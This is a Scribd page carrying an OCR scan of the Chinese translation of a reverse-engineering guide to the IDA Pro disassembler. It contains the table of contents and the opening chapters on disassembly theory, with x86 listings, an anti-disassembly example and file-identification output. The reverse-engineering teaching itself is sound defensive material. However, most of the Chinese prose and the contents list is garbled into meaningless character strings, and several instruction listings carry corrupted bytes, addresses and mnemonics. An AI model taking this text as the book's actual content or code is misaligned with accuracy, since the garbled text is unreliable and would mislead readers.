0% found this document useful (0 votes)
465 views501 pagesIDA Pro权威指南 (第2版) @
Uploaded by
Wenjie ZhengCopyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF or read online on Scribd
0% found this document useful (0 votes)
465 views501 pagesIDA Pro权威指南 (第2版) @
Uploaded by
Wenjie ZhengCopyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF or read online on Scribd
/ 501
Lee eC
The IDA Pro Book
The Unofficial Guide to the World’s Most Popular Disassembler
IDA ProfUaigri
[€] ChrisEagle #
coe oe se
ZA@POSTS & TELECOM PRESS
The IDA Pro Book
‘The Unofficial Guide tothe World's MostPopular Disasemble
IDA ProbQaiiPl orem)
IDA Pro
RGR. EI
(2ERKTRESUM) ROAM EOOARTATA, FTAA EEO, eee —aI
IDA Prov Hiliakit thi Rice a, SESAOERH Tk —Abteh, Chris Eagle Mie RA ARMS
Ate, TIRANA A IDA REM — AR
FRURTMASEOLROBAG AMIDA Pro RORAM, HAREM, RSNA YERIDA Promyaaie
A, BBG, SRORARERSAMOLGAA, HLARAB, MBG LRA EBB EIIDA Prom AK,
Chris Eagle LAMA HEL NRE URE RH AMAL RRM. iit TRSIDAMH, BSA SRT Gray Hat
Hacking—%, (hi@itiZBalckhat, Detcon, Toorcon#ShmooconS RSRLARLARG RF,
B IDA PoA# RE RSE
8 ZAIDA Pola Lime
8 HOLE IOMEFTH
cg
ood
coc
IM
Eft 89.0076
R—HMSt IDA fst
HR RLM
Ll BIC
1.2 fA
13 Aufl ~
13.1 Aap Be
13.2 mma
13.3 AREAL
13.4 Rowe
13.5 Sai
14 Sfp ICE
141 RAM RICE
14.2 Sibdade RICH
14.3 a FRAC
1s Ne
#2 Pea5seiclHA-
21 SPRL A
241 file
212 PE Tools.
2.13 PEMD.
22 HRT
2.2.1 nn
222 Idd-~
2.2.3 objdunp-
2.24 oto! sm ety
2.2.8 dumpoin
22.6 cefilt
23° RACMOTIR
Bs
23.1. strings
232 BiB
24 Ne
3H IDAPro RMR
3.1 Hex-Rays 2°79 52 RERIRRE
3.2, GOR IDA Pri
3.2.1 IDA MA. “
3.22 IDA#WTiE--
3.4.1 Windows #40
342 OSX # Linux #4
3.43 IDA 4 SELinux
3.44 3243 IDA 6442 IDA
3.45 IDA BRE EH -
3.5 IDA RIP RB-
3.6 MR
IDA BARK
RoBD
4% IAA
Al 3h IDA-
ALL IDA Sf aoa on
412 RA SHOILH MRE -
4.2 IDA SHER
42.1 408 IDA se
422 XH IDA SIE
423 Ce ARE
2 ak
43° IDA STIPE SP 42 632 =3bAlaek
44 WISH Bo AC TTAT I~ od 64 Nt
4.5 IDA RMSRAES - ,
46 Bitten 7 RCIA NR ME
47 MMB TA BAGH
TAL Ale REE.
BSR IDARERBO soe 7 TAQ QAR
5.1 IDA SEMEL O 47 113 FARA. 2
S11 GCA Re 7.2 IDA IARER. 2
$12 haw 721 BALE, 3
513 wee 12.2 TEM 84
5.2 UCR IDA Baan 7.2.3 ALi, AA e Ae RAE. 84
5.2.1 titel 124 Baka. - 84
522 73 BAR AER
5.23 131 RAR RRA 5
5.24 73.2 SCANS HER 87
5.2.5 73.3 MURA, : 88
33 $b ipa Bae 13.4 Bibs REAR. 93
5.3.1 Strings 7 14 BARU 98
53.2 Names #2 TAL RRA 94
$3.3 Kae 142 RRP ARE “95,
334 £250 743 fet atia : ”
53.5 ABEHO 9 TS ANB ose z
ange 9
ee ee fo OR RURAL S REA 100
a en 8.1 VRS HE RE
BL MeL AS
6e RRM 62 812 AHARIA 107
6.1 ABA IDA SAE ~ 62 8.2 Bist IDA aH AZ
6.11 ab Hi 62 82.1 ASE
6.1.2 Wea SAL 64 (BRE) » 12
613 PAR RIG 64 8.2.2 RAEI ROE “13
6.2 Eb 65 8.2.3, FABLE ELBE AYA nee 11S
621 ABR 66 uns
62.2 Beem Ey 69 “118
62.3 RAE ; 841 ii CHAE R J 18
6.2.4 IDA RBH 84.2 MAC ALA
63 WREEIE 8.5 GHATSRMRSE Ht...
63.1 SAAR 8.6 IDA TIL Xft
8.6.1 deahardy TIL tH
8.6.2 RE TIL
8.7 CHB LARAEA
87.1 this 484t
87.2 Bidet
873 TRL m ae
8.74 ZAR ~
8.75 SEAR RBA 130
8.7.6 BAKA one
8.7.7 CH ®TBRH RAR
88 JN a
HOS RRA SRHH-
91 BERGA mn
O11 RGR RIM
9.1.2 BRR
913 RRMA -
“123
92 IDASE
9.2.1 IDA SK (BS 3) ae
92.2 IDA MRR BRA — 147
93 Ae
S10% DANSAHAFL
10.1 #88) BSE IDA
O11 42) SAM LL
10.1.2, Windows #41 & 51
10.1.3 Linux A 52
10.14 OSX Rae 54
10.2 FH IDA fofit Rast
10.3 Nei
REBD
IDA BARA
11 ERI IDA
11 RBS
V1.1 EMEA: idacty-
112 GUIRCEXF: idagui.cty:
1113 @OlGaCR RA: idatuicty.
11.2 Sif IDA Reet DT
11.2.1 DAME.
11.2.2 £4) IDA LRU. 165
13 NEF oo “167
B12% (EA FLIRT SARE
12.1 EUR A ERR.
12.2 EFA FLIRT 4% -~
12.3 QURE FLIRT 4% XE
12.3.1 18H & REE -
123.2 RRR EA
123.3 ORAL nes
123.4 ORES
1235 Babes
124 hee
S13 AR IDA BYBTIR wr ernenenee 9)
131
13.1.1 IDSs.
13.1.2 tat IDS L4H
132 2A Tonio EEE
13.3 Ai ~
4k BANE PE EE
IDA BRE
186
+186
187
187
14.1
14.2 IDA LF ST 8
14.2.1 IDA 2 aly MAP Xft-
14.2.2 IDA 2a ASM Xft-
14.2.3 IDA 2.a4 INC 34
14.2.4 IDA 249 LST SH
14.2.5 IDA 2&8 EXE X# -
14.2.6 IDA 2&4) DIF X44:
14.2.7 IDA 2&8 HTML &4--
143 ¢hig:-—~. aS
#15 Ws IDABA-
DTA HRN ATR -
IDC if
15.1
15.2
153
15.4
15.5
15.6
15.7
a
xX
MS RIDA AUTRE
15.2.1
15.2.2
15.2.3
15.2.4
15.2.5
15.2.6
15.2.7
15.2.8
RR IDC BASS at
7A FAay IDC aK
15.4.1
15.4.2
15.43
15.4.4
15.4.5
15.4.6
15.4.7
15.4.8
15.4.9
15.410 SIA AR dt.
154.11
IDC BARA
15.5.1
15.5.2
15.5.3
15.5.4
15.5.5
15.5.6
IDAPython
IDAPython BRAN
15.7.1
15.7.2
15.7.3
me ks
IC ARK ~
wes
IDC at
IDC FR
IDC
IDC ABR AE.
IDC RASS AE
Brean ak
APRA ae
FER RMD
SPER AH aE Bi Bo
PRM HG 2H
RID Bo Hk th Batt
RAB RLM ast
PRK A AM Bett
HE ARM Bi Bk
Bic tare
BBA
BRA orn
BARRA Mo
Ha tho dt
RA AoA Ht Ha
PICA EA
cers
BRED “
BARA
15.7.4 eee,
18.8 AN
#16 &
16.
IDA RAF RTA
SDK fai SP
leL1 &# SDK
16.1.2 SDK #548 By 0-00
16.13 mee Ms SR
IDA REC
16.2.1 RARE
16.2.2 ASR
16.2.3 AA SDK MR
16.2.4 At SDK Hat.
16.2.5 IDA APIR RAS
16.3 AE ne
E17 IDA ERS
1721 SSEEE
VA AR
17.1.2 dithan dete,
17.1.3 $i 4...
VA ai ARAT
twats -
Hite.
SARE -
aR e-
DAR
17.6.1 #9 SDK # “BR” op
FFE .
420 SDK 4138 9 TL AH
42. F Windows #4 MP
BERR
17.6.4 #2 Qt ta Pe
117 BERRI
17.8
18 SEBS HES IDA SLA -.
18.1 RATS
18.2 Fai mge— 4S Windows PE SCH :
18.3. IDA Wa BeBEI
16.2
17.2
173
174
175
176
17.6.2
17.6.3
18.4 {FE SDK 8% IDA MaRH -.
18.4.1 “MR” tos
18.4.2 RE IDA BOR BARR ooo 288
18.4.3 IDA peap 22 B ower 288
18s Soha fnae AER 294
13.6 Si BOA CE 294
18.7 ANS
19% IDA Shea
19.1 Python 4585.
19.2 Python AER.
19.3 (EHH SDK #85 baa BESR
193.1 processor_t #4 tk.
193.2
1933
1934
19.3.5
19.3.6 KBB te
19.3.7 Zee processor t aH
19.4 FyRRAL REEL “
19.5 Sem BEA sham
19.6 REBAR BER AE Hit
19.7 SALA BEE
19.8 Ae ~
MESS RRA
BOE Resa
20.1 BRERA Ab SIH
20.2 RITITH----
20.3 REL main RR
20.4 BRR RAT AE
20.5 See
20.6 Ae
B21 MMT.
QL RASHES
21 ARE AH
211.2 SHIR debe.
AR 5
2113 FAS aM...
QL BA Rp ask EPA LI 356
21.2 RanSSPTET;
212.1 Hem diate,
2122 ARM oR”
21.2.3 HmLAIR ES -.
21.24 BIbIiK
21.3 £7 IDA x mae
“WAS 2B”
213.1 ie ta
21.3.2 caer tay 2 eM 366
21.4 RF RSLABO “375,
2S Av “ 377
B28 RAS...
22.1 GUA IDA SRSA Ta TA.
22.2 (AIDA HG RR
22.3 IDA SAP REFE iL.
22.3.1 ia A
2232 BARBER on
223.3 BPR MB aew
24
22.5
23% AIDA Hat
23.1, Hex-Rays
23.2 IDAPython--
23.3 collabREate-
23.4 ida-x86emu
23.5. Class Informer.~
23.6 MyNav
23.7 IdaPat
23.8 Ne
ABD IDA
% 24% IDAWKR
24.1 BWR
24.2 tke aA
24.3 UERAE
24.5
25H RCRA RR
25.1
25.2
28.3
23.4
PAR RMES 8 aie
24.4.1 BARBARA BAA coe
24.4.2 ARIA IDA MH EMR
a Aah
424
428
Mi
“431
PRA
IDA. ‘eae IDA manta.
ORO.
253.1 Bab BAE
25.3.2 A MS fo RRR
25.3.3 FART
25.3.4 AAS
DAStealth
25.5
25.6
B26R Rei HAe-
26.1
26.2
263
26.4
HRA
HERB
RAR
Asti
AHF IDA UATE RL
26.1.1 Al Hex Roys BiRBIE
26.1.2 sbAR S| BARIRAT
26.1.3 ALIERIM IA ae
2614 SERNRET RM
feat
‘MCF Bochs HEFT Bat
26.2.1 Bochs IDB #&X
26.2.2. Bochs PE #A, --
2623 Bochs HL ALSRIX
Areal .
ANB
EAA IDA KIRA 5.0
IDCISDK 38.231 Fh eon
Ri Bases
2H MASALA
3% IDA Pro RMA
iL gates
BART IDA Pro 5, PARTS BSA. UE, A
LL IDA 2y'Pil, HAR IE ANAS BEA HEIL LE W IDA Pro FAFA. HR, ATE AOHE IDA
PARAL MLR, RRR, TA (Re REE
SRAEE) Bt, BSORAR AS ATA. 7EiE EOIN, BORHILOEE EAE IDA PYRE GR RTEMDE
SEAT SFA MES AR ROE. Alte, ERHERIREE ST IDA BIDHTE, AFAR
PSC BT EAES , RUSTE IDA AYRE IIE (RAIA BEAR HEBD
HVE). RAEI IDA MTA DIRE. HL, AER, TEMA TREAT, AS
SPARC SURE ICA FA, XLRI IDA ROT AAPA RA
FEMI IDA ZA, THERESE RIANA, DBASE ae ET
CRA A, SAE. BR LE Rin IDA 2TH. (EAA IDA HY
ARNE, ABA TRA] TA IDA HYET AE. ARREARS E BINA RL aS
1.1 RCI
FEES PA A AMBRE, SPARE LAR, FB DRA Oa
Hi Fo
OF—-KBE. KE RAEI, —tH Of 1 ER Sees Cin +E )
A. RABAT HEIE TT. PRGA ARATE, TERE
HEMRATK, ARES RABI. BARKS ES, At
DA 5 A, ULAR TIE AS BH — 2 4] TA
OS=KEE. HIKARU IcRBS, CRAY MRA AORARAA.
16, TAS FUA, SBR TICS AEA (Msrieat )
ME. AMR, RABI TRE RICES CARES. Lm BRE
FE FA ORAL iS PR BAT UL ASS
O MERBA. RAASLA TRS (CER), Hae
GUITARRA. WS, POUR MRETHEME A. HE, HTB aS
WFO TE FREER, CNEAA DFG ROE. BLOBS
13) AMAT 3
‘Flim FORTRAN, COBOL, C Al Java. S07 Aid i AE BE Ee SURILRIE
RARER RAE S (RAAB MONE, IEW).
OSDKBA. RATERTE, ASABAK, AMMA BHT.
1.2 WARIS
TEAST SOY, BEE BU ERR CoRR ABER AR — PL RET AT
BAY. AT BRE (SUPE UE TM LE), RS AAR AR
RAPE, BOLT ARI SALES, 2H. SOC, Atk, Be
AVATAR SCRE SIERO AR CLARET EAA a CA BERE IU LAT SRS BE ERE,
MA ARA, RNR NBT
PERPHA ORATOR. A, TEM E
FF BSE FT ERE YA SE — MI EE HR, PPE EF DAL, WB AT IH
O METAS ARK. Ma TARR , ERE (TE AERA
TASER AS EE ) ata, BBI—7 32 HARARE REE. IRL BT.
ARE MARERS P32 TRAE AEA BBE AS 32 LUPE 32 (SRT
OMERF SH SIRE. RRA LORS A RL Ri, TTL
SAT A LES A ORE. Alte, RE, RPE,
REFS BI SAARI TNA RE.
O Rom S TB Pm. FEST TARA C RAE AE rh Delphi HE8E
ARIS SREADUT, THREE AEM. TIRE, HIXt Windows 4882 APL —JEit
SAEED EP READ a PES) Windows —HERISCHR, (BAN AE BIEL ATA HIME.
OFSEMARRE—TIOMM RE, BLP RAVRIL MRD. LPIA, LiL
Spay Be (Ta SB EAC
38 23 BE AMA ST EIS HIN PERE Hex-Rays,
1.3 ARIF
FES, CTT AE TPE OR PEER 7 PRE RETT BAT Sea
We SUBOLELIEL PILAS
OFT R ER.
PAT a.
O SPATE HERE
0 STREETS, LURES PRR PERE ALA OEE.
O EEL RS
PESTA LB —
4 RAE RC AT
1.3.1 Sr
SH, THAT eT “HER” EARS, BRE te A — a TB
SiR, PRR, SET RS TL. IRAE AA, ARTA
ASSES ATE EAT EBB AR. 3h AH ( dynamic analysis ) AH AEP MRS Hl IEE
fe) PETRA, IFO ARGO SAT RCRA TY. HL, HS 74 ( static analysis )
UA EL CF AT 0 HE, BRE ET IZ
BINARY.
1.3.2 dat
Fy FLL, BATHE TES PEST 3 ERR: ALI. STU. FP
ESF (exploit), KLAEAHAGKE, PIURARESRRUTRSAK, (Ee, MRA
SR, TRB BAB. REA —TER, BR BBE PERT BAL
FERRE. ALT, RATED EL SRN has ABI — AM, aL eT
EB HERE EEA ). — ARS ATR AIT. Date On
WALES A, MURATA, Cet Ata PAB
ET MERI MMT DAT ER, LBS EET PBST. BN, EAA
+t 70 FSA, TERESA, SP AB) 80°F, MK — ARRAS Wh,
SET FRESE PR OVA) RY FS CLE BCP SN TA EET HEE, PE IL
EAU. HET SURE, TS ees RAE, BUS, we
(EFA IS aS ARES. ALOT DATE Ae ee
1.3.3 RABI
SMSRALVA MEAN Be, REFS RAR EAT LAS EOE, BR RHE
ABA ESE RE EERO OF Sa SA TS, BLE A
AF. WR) RRS, SEAT, TRACT 6 LAE, BBA TOF
RARER REE , ORR RTE RIT LR. EF. BRST
SUP EME-ASENBOTE MEAS, OT RRA, UST T REN BUENOS
1.3.4 SPR ME
HT aE SE (BUICSERE ) AFAR LER, RE A I A EE
BERL AEA BHU STA BLK AT AP PRR ACE A TL BSL, ROR, EY
AREA TED AS BOE, WPA LEE RRS ATT, EE.
D BRANT — RTCA, ERT AA LAA, RE NA Se cea ATH.
Se, MCAT CAO
14 dott Ricth 5
13.5 Sriitias
FERRE at ER, ESE eR A. BA, TR AAD
SRT ES A. EAE AEM RI, TEAC MOAR, CAT RSH,
BACAR. A, FEVER, Oy TRAIT, BPR RS EN
RAL A
1.4 Sn iC
BME, PO BAI ST RICAN, PIR AMTRICH. LAGI ete eT — RE
ESAR: HT—* LOOKB HLH, HRP PH RBH MH, ARORA ESL
BAY, MRAP, REMMI R, EAMES, RMT AMM SRE,
MUSE ALGAE ELI, PUREE ae RB E AR, ESS IT BOL EAS PP REE
ATER, ICR ELA KR LB AE, ALERT
A LTA PIT FS 9 BE Be SCT BO, ET: LAY BI i BS
FER, RATES MARL AG RAT A EAR. TEST A BS)
Wy, POAT EAT RR, PA SEP RE RIC a RRA TEA TOS. Tee A a a
JE, BEATE FF BRR IL ae ART
1.4.1 RAM RIB
WBEDER, AIF RSPAS A. LOSE NAR A OR BCT
PRT RAMRILRLE TOR, BRAT AR.
OFS, REUTRICAMORBER, RHARARBAMM. BM, HOSEA
Ati, RPE BR. DR LY —§ BI $a,
PRS BRE Fo BT RAT IC EO SA A SK. Windows ATE FAY TS HiT DAT
(Portable Executable, PE) MX BRIE S Unix RCH AAI T 45 Ae ARH X ( Executable and
linking format, ELF ). x88 7i FOU, FDR RISE Pa SUA A
CLR (GH PRL RR TER)
O B=s. AUER S MIL, FRR (SOC) Sree,
JAMIA, HUA SEIS a BICR, BUR IL
SANTEE ASS ARE, URE RES a, AT SELMA SORE
EAL AT REE DAAR 45 HATE BASE AG Sr Fs PREM. RE PHES AE I ERS R,
‘MN Intel x86, BERRA, RRR RBUNE STS.
ORES. RAUF TE ESN, REM ERR A SPH TS,
DAG AIRS Mii, — SLR LIE, HR EUR LRU RS
6 RAE RICA
16, FFE SUR. ASL RT OEE, PN, x86 ICME
PEATE APE BARS Intel HERA AT&T Mak
O Os. i —AHOR, RICE AS, HEM be, RICE
TEAS.
MOO ICMIESR: ATAT A Intel 5
METH LLAM MAIER: ATAT Hie Intel 1. AE ONMAT RR
BF, ORAAMERERE. BE. FABTA. RBOALTS, MRP PABEED
DMAAE AM ZH. ATRT ILMB ANA TA BBA MR, ASEALT RE (4
YAS PPAR aR) OOM, CURA RT REMD: RSET A, BTA.
42M ATRT BR, BAX PABA 4 4A: add §0x4,2eax. GNU ICM (Gas) AoI+ FH
AY GNU FL (de geo # gdb) AMAIA AT&T 67.
Intel #24 ATRTBEAA, CXELFASPAFMM, EH MAAAAS ATRT
FEA RIEAL: HORM T Ak, AMT AW. RA Intel oe, beak
#484: add ean. 0x4. 48 Intel sik M4 iC oe 3 O.46 $4 JCM $ (MASM ), Borland 4 Turbo
iC.th 8 (TASM) 4 Netwide i 4% (NASM).
A BPI PT HF BE MATERA BI a, Ova FARA SE, OR A
ete, VL Be MRTG FE AAT 7e WOR Hi — RES RAS. NEATH (linear sweep ) FAK I3 F BE
(recursive descent ) SPUR ER RI eI»
14.2 Se RICE
RAS IT Sia PATRI AE BD A DF BE AG BEI TL HS HA; — AR
KR ROTA. Al, BEARER, HMRI, BREE
HATO CH ESL AES ) Me SR LES. BULA —
BEI I, HERS MUR, BRACES, HOBIE MUGER.
BO AIEFE A SLI) PAE EA OR TAPPER SH TE
BET LISA, PLLA oR MITE TE IL Sa A A. ES
"P,P AHR, EAD BUE TAGE RIL RE Hate, RE
AEE MISH RTESHE (aU MIPS ) LET RICA SEN , RTT ee
Fates.
SUSIE BEEN, TEP CRB 8 OO ET A SEL. RST AE
BARR, AE Ba 9B SSE FT ET. U1 RT RR, ED
BEE LIAS Sh — PRTG SA A RAP switch HY, ROBE
JHE EPR AOR BUT switch 1), TEL, Sa aRvePE Ce BGM SEH A — NB
14 eR 7
Ho 401250 (@) ADM) jmp HATS PU 401287 (@ ) ARMA AhI ke. (ELL, BRI |
HE (@) (dy — Sie DOMES, SPORE TIERONE ISL,
FR 1-1 EH Ie
ao123#: 55 push ebp
401240: 8b ec mov ebp,esp
401282: 33 CO xor —€9x, eax
401244: 8b 55 08 mov edx,DWORD PTR [ebp+8)
401287; 83 fa 0c cmp edx,oxc
4o124ai of 87 90 00 00 00 Ja oxqo1ze0
© 401250: FF 24 95 57 12 40.00 jmp DNORD PTR [edx*4+0x401257]
© 401257: e012 Loopne 0x40126b
401259: 40 inc eax
40125a: 00 &b 12 40 00 90 add BYTE PTR [ebx-ox6Fffbfee],c1
401260: 12 40 00 adc al, BYTE PTR [eax]
401263: 95 xchg — ebp,eax
401264: 12 40 00 adc’ al, BYTE PTR [eax]
401267: 9a 12 4000 a2 12 40 call_0x4012:0xa2004012
40126e: 00 ga 12 40 00 b2 add BYTE PTR [edx-oxadffbfee] ,ch
401274: 12-40 00 adc al, 8YTE PTR [eax]
401277: ba 12 40 00 c2 mov edx,0xc2004012
4o127c: 12-40 00 adc al,8YTE PTR [eax]
4o127F: ca 12 40 Inet oxg012
401282: 00 42 add di,di
401284: 12 40 00 ade al, BYTE PTR feax]
401287: da 12 ficom WORD PTR [edx]
401289: 40 inc eax
40128a: 00 8b 45 Oc eb 50 add BYTE PTR [ebxeoxSoeb0c45],c1
401290: 8b 45 10 mov eax, NORD PTR [ebps16]
401293: eb db jmp _0x4012e0
ARLHS (@ ) DFR RR AOIESE 4 SAL HE ame (little endian) RAT, BATH, SME
ALARA — Ts LSB UTES. SER, Rei h ePaeBee EN By ebE (0040120.
0040128b, 00401290...) PAI—t. PAilk, (@ ) Abt loopne HIFAE AHH; HR, ERK
ER HEI AACA TEA SATE
GNU REE ( gdb ), BCAA) WinDbg JHECREAT ob jdump 3 FLA A BEL 285 | BIR,
PELE.
1.4.3 jG TRE IC SS
IT FER Ih — AEE 5 UTD RETR EER 3 BEL TARE
HRS R ERA ASSERT RIC, FAT BE, BATHE
ARSE CPU HES HR ETH UT EIS,
D A CRU MAE hae LN RRA ACE NS, MUS CPU WHR Cbigrendian) CPU; S5E% CPU HILAF
ERUEADRCEN , URI H (lttle-endial ) CPU,
8 1S Ric mA
1 NRE
SUF TAR SHE DUTT RLS BIL 8 FZ, MURR ROI UI AE,
Madd; APRS AVEZ IMAM, Ha mov; ARRAS. tn push AM pop. BAGH DRI EEIT.
SLBA TAT.
2. RAKES
FESPA (40 x86 nz) HELTAH READ RAEE. MURRIETA, FRE
DANEEL, POLED EM A tk. (HAL, MURR PE ITE, MUMBA THES
FREI RIL — StS. ANAT REAR Pm RRR SR, BUTE
PES ICM LR BE AREAS. WANT, CESS ERAS OH SU 8) AAS A EAT I UN Mo
FZ, NTRS BES IC
3. RADE
AAA A ARR HEROR,, C, CB ESRDUARL E, STP
SF, DTU SINS, (LIRA ON RASH OST, BL, At
WELK, BARARRAE READS OR ie, u,b AT.
RATS aE
SARI PS OR RE GR HEY ER OE a BE YH
Fo RRA, EMEA Ae APSE AT fe So UF I AE RU. ABE HE
FMT, BONERS ARAL EDES Hb. x86 OY Jmp eax HO RLIERT Hi)
. VARUP ASAT, cox MPT LOAM, hi PRR AREER
PLATA, FUERA BRE SY AR, WRLC URE MT Aa ke I
4, BRS
BRR SANS TT HR SAAR OAR RABI, (ALERT call eax SFR
SHAPE), HEART, — ELST, DAT ECHR IELY RAREST. HER
Tiki, CASAS ROAM, EVE TAGS. ULE BR BOR SI HE
SSA TILA AAG ALIN BOT", TSR DF es EAE LL AOL PAR HE SEAT IT,
SCT FPRHGE EIS. UUIREFP RATT BLE, RUS MEBRATAT ARAN PALA, meh 9
RAY he os ET CHE She, IR, ERMC, SOR) IRIS
TEUAIRU ALL. FOTOS BRE — TOT. CEM, Bee foo TERE IVA
Bi, SARUM T 1.
Foo proc near
FF 04 24 inc dword ptr [esp] ; increments saved return addr
ES FT FF FF FF call foo
05 89 45 F890 @add eax, 90F8458gh
14 det Re 9
SR, TEVYH foo Zit, HEMT LIANE EI (O ) Sih add HS. TAM RICA
MOF SAR.
0 proc near
FE on 24 inc dword ptr [esp]
GB retn
foo endp
ES FT FF FF FF call foo
05 4b 5 ;formerly the first byte of the add instruction
89 45 FB @nov — [ebp-8], eax
90 nop
CLEARER AR TFSI. SRL, PRL foo RAUB ELAT th Fe sbey
mov #82. (AAT RRA, SUES 2 Ia ah A] Reh eRe TE BSI, FA
RAAT.
5. BEES
Fat, BATA T AE. TA, BYGRPHES (hn x86 ret) BART
SORBET INTE S Mia. DT, SUP RSCIEAES TT, MAT LU RR BS — Mi,
FEA HOLL TT RRL DATES. (HUE, ROMER AL AVR. A RI aT RS
PR Ae BC, ATF ELIT St 8 ee HE — EIS ATS SA AS
SRA NAE A aE, ER RE 2 CEPR RUA RL TE SE
WH.
AUT PERAK — TERRACE, CAA RHO SEE RAE. HEE TH
NIE, CRD ae RIL aE HE a GRO, BE RIE EE
F, BARRA Re, WE RR STORET BP A IA. PRT, LER
SOFA P RS CS ROAR SEIN) AL (heuristics ) CATH, BAVA EBL IL a as REET ATU,
FATE AUS SR. PUTED 1-2 FARTHER A 1-1 PAY switch ADA BR
RETAIN AR
AAAS 1-2 FRR
(0040123F push ebp
00401240 mov ebp, esp
00401242 xor eax, eax
00401244 mov edx, [ebptarg_ 0]
(00401247 cmp edx, Och 5 switch 13 cases
00401244 ja loc_4012E0 5 default
00401264 5 jumptable 00401250 case 0
00401250 jmp ds:oFf 402257[edx*4] ; switch jump
0401250 ; ~~ -
(00401257 of#_40125;
00401257 dd offset loc 401260 ; DATA XREF: sub_40123Fe11r
lo AE RIC AY
00401257 dd offset loc_s0128B; jump table for switch statenent
00401257 dd offset loc_401290
00401257 dd of fset loc_401295
00403257 dd of fset loc 40129
00401257 dd offset 1oc_4012A2
00401257
00401257
(00401257 dd offset loc 401284
00402257 dd offset loc 4012¢2
(00401257 dd offset loc_4012CA
00401257 dd offset loc_401202
00901257
00901288 ; -
00401288,
(00401288 1oc_401288: 5 CODE XREF: sub_40123F+12j
00401288 5 DATA XREF: sub_40123F:off_4012570
00901288 mov eax, [ebprarg_a] 5 jumptable 00401250 case 1
(0040128 jmp short Loc 4012E0 ; default
0040228E 3 junptable 00401250 case 0
TER, BR BRE BURHIHR, FUE TABLAS SEL... IDA Pro FRR SU AS
FRESE. TBI Fe Bh FRA IDA FoR ETRE RIE, A Beta
FM EBLE IDA HER
15 MB
ARIAL ARM, ABER A TRI RTA? BASE, TE eA aa sb?
aR) EDT BI LAT, MF LR EKER, ARAMA, HZ:
SIBEA BIAS, Ey AREA OL ORES BEE ASE BRE AOE RE ET
1, kA T HEAR.
EPH, RIMTH RIDES N HA LBA FOMMRALA, BRENIS DA
WHHRKR, RSL AMY WA ME MN, MACABRE IDA
LB RMARHAR.
Bea SRiLwLAR
ICR HA RAVUR, TRAE IDA Pro ZAt, SAS Ew
BoM NLA, SRE TAT. RAT AAS WA 2H,
Ft ERE FP BG SMT UE CPE, LUI WIFE IDA ROSTER. MURIEL, IDA Heke TL
FURS TIRE ABI AR PUR ET, 62k) RET MRR, BU, RAE IDA SE
SPRAINS, APE ILRATI RAO TER, ANSE 24 ~HS 26 ATT
Ee
21 PBIA
JH, FEVERS, AU Ae ATE, hn BRM PAR
fF", RT ROU, BRR Re ECR. BRR HY
FEM FEBRF RET “SCOT RA FETT” ENSUE, ARITA AAR ELAS
ALR.
2.1.1 file
Tile tro — ERIS T AL, KAPCNIX HUE EUSPER SEAL Windows Fy Cygwin?at
MinGw? SLAB PATI TSE IATA fi Ve Be PL RE CFE BOR HE
AUBY, Pile REABULRL A LISA, ne! /bin/sh ( shell BAAS SCH) ai CHTML 3ce4 ). 48
22, WAM Adk ASCH MAM UTRARAS, CAMA, file SBA HMI
ERAT ORME MI CEN, BRL, ERE CES STA RL GE
PRAZTEO ) TF TRARY ANE ARIAL eh TIL A PE I
© 4551. np: swe cygwin com/,
® #8. mupstonww.mingw.or/.
@ sr AREAS RICA EOR VARI, TASCA AMALIE. AU, AASB AT
IRIOUR, Gin, MS-DOS HT IFT HB M2 AREAL MS-DOS IRRHII Mark Zbikowaki 8A WS PF EATS.
ARTI, Java ff lass APE T AER Oxcotenate, HAREM NCI, (LEB ER NAB CtZ
AHERN AM,
12 #2% BHSRCHOR
Windows PE executable file
(00000000 4D SA.90 00 03 00 00 00 04 00 00 00
(90000010 88 00 00 00 00 00 00.90 40 00 00 00
Jpeg inage File
(00000000 FF D8 FF FO 00 10 4A 46 49 46 00 o1
{90000010 00 60 00 00 FF DB C0 43 00 OA 07 07
Java .class file
(90000000 CA FE BA BE 00 00 00 32 00 98 OA 00 2E 00 3E 08
00000010 00 3F 09 00 40 00 41 08 00 42 OA CO 43 00 44 OA
File HESPUUHAC READ ICPHESR, ALTER ASCII SOIC ARPT IAT ICAP ARAB SICHE. File
DTT HH 30 CAF ( magic file ) SLA ASL 6 ROCHE EER SET
SH, WLW AUER fusr/share/file/magic, /ust/share/misc/magic Wileto/magic, KT BAA XI
SOUHHER., WSR fe MCE.
Cygwin & Windows +f #6? H—#1 FMA LH, THAR Linux HUGH) 4 shell F748 KAZ
A. BRRMEY, AABRROTHUM Pik, GMB (te gee. gt+). MARE (to
Perl. Python. Ruby), P& ATH (dene, ssh) F. KRM Cygwins, +H A Linux HH
ALATA Windows Aa MIA ATT.
FERAL T , file LAR RSIR HRE N PME . UEREERT file ®
ALABAB EU JLAAR TRAY ELF SEIS, WLS HR EET Ae al OC ar Ck AS )
DRIER TAPS AB
‘idabook# file ch2_ex_*
cha ex.exe: MS-DOS executable PE for MS Windows (console)
Intel 80386 32-bit
ccha_ex_upx.exe: MS-DOS executable PE for MS Windows (console)
Intel 80386 32-bit, UPX compressed
cha_ex_freebsd: ELF 32-bit LSB executable, Intel 80386,
version 1 (FreeBSD), for FreeBSD 5.4,
dynamically Linked (uses shared Libs),
FreeBSD-style, not stripped
cha_ex_freebsd_static: ELF 32-bit LSB executable, Intel 80386,
version 1 (FreeBSD), for FreeBSD 5.4,
statically linked, FreeBSD-style, not stripped
cha_ex freebsd_static_strip: ELF 32-bit LSB executable, Intel 80386,
version 1 (Free8Sb), for FreeBSD 5.4,
statically linked, FreeBSD-style, stripped
cha_ex Linux: ELF 32-bit LSB executable, Intel 80386,
version 1 (SYSV), for GNU/Linux 2.6.9,
dynamically Linked (uses shared libs),
not stripped
21 FREE 13
ch2_ex linux static: ELF 32-bit LSB executable, Intel 80386,
version 1 (SYSV); for GNU/Linux 2.6.9,
statically linked, not stripped
cha_ex linux static_strip: ELF 32-bit LSB executable, Intel 80386,
version 1 (SYSV), for GNU/Linux 2.6.9,
statically linked, stripped
chz_ex Linux stripped: ELF 32-bit LSB executable, Intel 80386,
version 1 (SYSV), for GNU/Linux 2.6.9,
dynamically linked (uses shared libs), stripped
Sie
“PRORMLAM ES” RRAHRMLHEPMRAS. RHR R ARH Ol AAP
GFE S. ARRAY THAT ASAT AL, SEP AEF A MRR AE MAT
HAMMAR, HOME, ASA TRES HRA AREA AN HEE. MR
RRS, HEPAT. AMM, HEME HLATHHRRS MERLE.
